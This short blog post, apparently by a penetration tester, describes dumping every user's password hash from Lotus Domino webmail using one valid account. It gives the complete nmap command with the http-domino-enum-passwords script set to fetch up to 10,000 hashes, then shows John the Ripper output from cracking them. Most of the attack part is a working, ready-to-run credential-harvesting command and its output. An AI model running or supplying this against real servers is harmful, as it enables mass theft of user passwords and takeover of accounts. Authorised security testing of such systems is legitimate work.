Apr 202019

Another little known fact I stumbled upon: Lotus Domino (the webmail for Lotus Notes) allows you to get the password hash of every single user. Once cracked you can login to the Lotus Domino website without having the key (because a copy is left at the server – why do we have the key actually? well its the IBM way of doing security…..).

NMAP provides a script that will happily download all the password hashes for you. Downside is that you need one valid user. Was still good enough for me. 

C:\nmap-7.70>nmap –script http-domino-enum-passwords -p 80 <target host> –script-args http-domino-enum-passwords.username=”<lotes login, e.g. John Doe>”,http-domino-enum-passwords.password=”<your notes password>”,http-domino-enum-passwords.idpath=”.”,http-domino-enum-passwords.count=”10000″ > domino-passwords.txt

John The Ripper will recognize and crack the hashes:

Using default input encoding: UTF-8
Loaded xxxxx password hashes with xxxxx different salts (dominosec, Lotus Notes/Domino 6 More Secure Internet Password [8/64])
Remaining xxxx password hashes with xxxx different salts
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 2.48% 1/3 (ETA: 13:26:32) 0g/s 359043p/s 359043c/s 359130C/s fp feedback0..p feedbackp2